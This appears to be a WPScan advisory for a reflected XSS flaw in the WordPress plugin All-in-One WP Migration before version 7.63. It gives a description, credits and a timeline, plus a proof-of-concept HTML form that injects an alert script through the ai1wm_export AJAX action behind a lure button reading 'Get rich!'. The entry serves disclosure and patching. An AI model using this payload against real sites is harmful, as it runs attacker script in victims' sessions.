WordPress Plugin Vulnerabilities
All-in-One WP Migration < 7.63 - Unauthenticated Reflected XSS
Description
The plugin uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed in the victims session. Note: This requires knowledge of a static secret key
Proof of Concept
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
<!--
Note: The secret key must be obtained through other means.
It is stored in the site option `ai1wm_secret_key`, but is
static for the lifetime of the site.
-->
<input type="hidden" name="secret_key" value="[secret_key]">
<input type="hidden" name="ai1wm_manual_export" value="1">
<input type="hidden" name="archive" value="<img src=x onclick=alert(/XSS/)>">
<input type="submit" value="Get rich!">
</form>
Affects Plugins
Fixed in 7.63 References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Team ISH Tecnologia (Thiago Martins, Jorge Buzeti, Leandro Inacio, Lucas de Souza, Matheus Oliveira, Filipe Baptistella, Leonardo Paiva, Jose Thomaz, Joao Maciel, Vinicius Pereira, Geovanni Campos, Hudson Nowak, Guilherme Acerbi)
Submitter
Vinicius Pereira
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-23 (about 1 years ago)
Added
2022-08-23 (about 1 years ago)
Last Updated
2023-05-13 (about 1 years ago)
WPScan 